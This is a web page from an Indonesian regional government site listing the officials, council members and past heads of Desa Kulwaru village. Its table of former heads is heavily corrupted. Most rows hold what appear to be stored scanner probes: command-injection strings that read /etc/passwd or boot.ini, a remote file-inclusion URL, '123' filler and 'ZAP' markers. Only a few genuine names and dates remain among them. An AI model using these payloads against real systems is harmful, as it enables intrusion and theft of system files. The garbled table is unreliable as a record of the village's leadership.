Desa Kulwaru

Beranda / Kecamatan Wates / Desa Kulwaru

Desa : Kulwaru
Kecamatan : Wates
Kepala Desa : RIDWAN USMAN, S.H., M.M. (Pj. Lurah)

# Nama Jabatan
1. RIDWAN USMAN, S.H., M.M. (PJ. LURAH) Lurah
2. ASTRI ZAYANNA FAUZIA,S.SI Carik
3. EVY SUSANTI Panata Laksana Sarta Pangripta
4. LISARIANA HIDAYAT, S.PD. Danarta
5. SUGIYONO, S.AG Jagabaya
6. SUGIYANTO, S.T. Ulu-ulu
7. TRIJANA Kamituwa
8. SUGIMIN Dukuh Kulwaru Kulon
9. WAGIMAN Dukuh Kulwaru Wetan
10. IMAM TAUFIK Dukuh Kanoman
11. MUHAMMAD NURYASIN Dukuh Kuwirun
12. HIDAYAT Dukuh Serangrejo
13. KELIK SUHARIYANTO Dukuh Granti

# Nama Jabatan
1. SUKARMAN Ketua
2. SAMBUDI Wakil Ketua
3. BARKAH LAKSANA Sekretaris
4. SUTARISMAN Ketua Bidang Penyelenggaraan Pemerintah Kalurahan
5. MUGIYONO Ketua Bidang Pembangunan Kalurahan dan Pemberdayaa
6. WARIH WULAN PURWANTORO Anggota
7. SRI SURYATI Anggota

# Nama Kepala Desa Awal Masa Jabatan Akhir Masa Jabatan
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62. IMAM HUDAYA ,S.Pt 09/0 01/0
63. 123 123 ">
64. 123 123 ">
65. 123 123 .sys
66. 123 123 .sys
67. 123 123 .sys
68. 123 123 .sys
69. |cat /etc/passwd| 123 123
70. system("cat /etc/passwd"); 123 123
71. :system("cat /etc/passwd"). 123 123
72. 123 123
73. 123" 123 123
74. :system("cat /etc/passwd"); 123 123
75. .system("cat /etc/passwd"). 123 123
76. ;system("cat /etc/passwd"). 123 123
77. |cat /etc/passwd.dat| 123 123
78. |cat /etc/passwd.htm| 123 123
79. |cat /etc/passwd.html| 123 123
80. |cat /etc/passwd 123 123
81. "> 123 123
82. |cat /etc/passwd| 123 123
83. ;system("cat /etc/passwd"); 123 123
84. ;system("cat /etc/passwd") 123 123
85. `cat /etc/passwd` 123 123
86. ;system("type c:oot.ini") 123 123
87. ;system("type c:oot.ini"); 123 123
88. :system("type c:oot.ini"). 123 123
89. `type c:oot.ini` 123 123
90. `type c:oot.ini`; 123 123
91. ;type c:oot.ini; 123 123
92. http://uniscan.sourceforge.net/c.txt? 123 123
93. 123" 123 123
94. "> 123 123
95. 123 123
96. ;system("type c:oot.ini"). 123 123
97. system("type c:oot.ini"); 123 123
98. |type c:oot.ini 123 123
99. ;cat /etc/passwd; 123 123
100. `cat /etc/passwd`; 123 123
101. |type c:oot.ini| 123 123
102. |type c:oot.ini| 123 123
103. .system("type c:oot.ini"). 123 123
104. |type c:oot.ini.dat| 123 123
105. :system("type c:oot.ini"); 123 123
106. |type c:oot.ini.htm| 123 123
107. |type c:oot.ini.html| 123 123
108. 123" 123 123
109. :system("cat /etc/passwd"); 123 123
110. |type c:oot.ini.htm| 123 123
111. |type c:oot.ini 123 123
112. `cat /etc/passwd`; 123 123
113. ;cat /etc/passwd; 123 123
114. |type c:oot.ini.html| 123 123
115. ;system("cat /etc/passwd") 123 123
116. :system("cat /etc/passwd"). 123 123
117. ;system("cat /etc/passwd"). 123 123
118. ;system("type c:oot.ini") 123 123
119. |type c:oot.ini| 123 123
120. |type c:oot.ini| 123 123
121. `type c:oot.ini` 123 123
122. ;type c:oot.ini; 123 123
123. `type c:oot.ini`; 123 123
124. :system("type c:oot.ini"). 123 123
125. :system("type c:oot.ini"); 123 123
126. ;system("type c:oot.ini"); 123 123
127. .system("type c:oot.ini"). 123 123
128. |type c:oot.ini.dat| 123 123
129. system("type c:oot.ini"); 123 123
130. ;system("cat /etc/passwd"); 123 123
131. |cat /etc/passwd| 123 123
132. |cat /etc/passwd| 123 123
133. |cat /etc/passwd.html| 123 123
134. |cat /etc/passwd 123 123
135. system("cat /etc/passwd"); 123 123
136. .system("cat /etc/passwd"). 123 123
137. |cat /etc/passwd.dat| 123 123
138. `cat /etc/passwd` 123 123
139. |cat /etc/passwd.htm| 123 123
140. http://uniscan.sourceforge.net/c.txt? 123 123
141. ;system("type c:oot.ini"). 123 123
142. 123 123 123"
143. 123 123 123"
144. 123 123 123"
145. 123 123 :sys
146. 123 123 :sys
147. 123 123 :sys
148. 123 123 :sys
149. 123 123 :sys
150. 123 123 :sys
151. 123 123 :sys
152. 123 123 :sys
153. 123 123 ;cat
154. 123 123 ;cat
155. 123 123 ;sys
156. 123 123 ;sys
157. 123 123 ;sys
158. 123 123 ;sys
159. 123 123 ;sys
160. 123 123 ;sys
161. 123 123 ;sys
162. 123 123 ;sys
163. 123 123 ;sys
164. 123 123 ;sys
165. 123 123 ;sys
166. 123 123 ;sys
167. 123 123 ;typ
168. 123 123 ;typ
169. 123 123
170. 123 123
171. 123 123 http
172. 123 123 http
173. 123 123 syst
174. 123 123 syst
175. 123 123 syst
176. 123 123 syst
177. 123 123 `cat
178. 123 123 `cat
179. 123 123 `cat
180. 123 123 `cat
181. 123 123 `typ
182. 123 123 `typ
183. 123 123 `typ
184. 123 123 `typ
185. 123 123 |cat
186. 123 123 |cat
187. 123 123 |cat
188. 123 123 |cat
189. 123 123 |cat
190. 123 123 |cat
191. 123 123 |cat
192. 123 123 |cat
193. 123 123 |cat
194. 123 123 |cat
195. 123 123 |cat
196. 123 123 |cat
197. 123 123 |typ
198. 123 123 |typ
199. 123 123 |typ
200. 123 123 |typ
201. 123 123 |typ
202. 123 123 |typ
203. 123 123 |typ
204. 123 123 |typ
205. 123 123 |typ
206. 123 123 |typ
207. 123 123 |typ
208. 123 123 |typ
209. 123 123" 123
210. 123 123" 123
211. 123 123" 123
212. Ali Musahid 1925 1947
213. Kasan Mustadi 1947 1978
214. Atmo Yuwono 1978 1986
215. Mujirahayu 1986 1996
216. Kusnaeni 1996 2004
217. Supardijo 2004 2006
218. Legiman 2008 2014
219. IMAM HUDAYA S.Pt 2014 2020
220. 123 :sys 123
221. 123 :sys 123
222. 123 :sys 123
223. 123 :sys 123
224. 123 :sys 123
225. 123 :sys 123
226. 123 :sys 123
227. 123 :sys 123
228. 123 ;cat 123
229. 123 ;cat 123
230. 123 ;sys 123
231. 123 ;sys 123
232. 123 ;sys 123
233. 123 ;sys 123
234. 123 ;sys 123
235. 123 ;sys 123
236. 123 ;sys 123
237. 123 ;sys 123
238. 123 ;sys 123
239. 123 ;sys 123
240. 123 ;sys 123
241. 123 ;sys 123
242. 123 ;typ 123
243. 123 ;typ 123
244. 123 123
245. 123 123
246. 123 http 123
247. 123 http 123
248. 123 syst 123
249. 123 syst 123
250. 123 syst 123
251. 123 syst 123
252. ZAP ZAP ZAP
253. 123 `cat 123
254. 123 `cat 123
255. 123 `cat 123
256. 123 `cat 123
257. 123 `typ 123
258. 123 `typ 123
259. 123 `typ 123
260. 123 `typ 123
261. 123 |cat 123
262. 123 |cat 123
263. 123 |cat 123
264. 123 |cat 123
265. 123 |cat 123
266. 123 |cat 123
267. 123 |cat 123
268. 123 |cat 123
269. 123 |cat 123
270. 123 |cat 123
271. 123 |cat 123
272. 123 |cat 123
273. 123 |typ 123
274. 123 |typ 123
275. 123 |typ 123
276. 123 |typ 123
277. 123 |typ 123
278. 123 |typ 123
279. 123 |typ 123
280. 123 |typ 123
281. 123 |typ 123
282. 123 |typ 123
283. 123 |typ 123
284. 123 |typ 123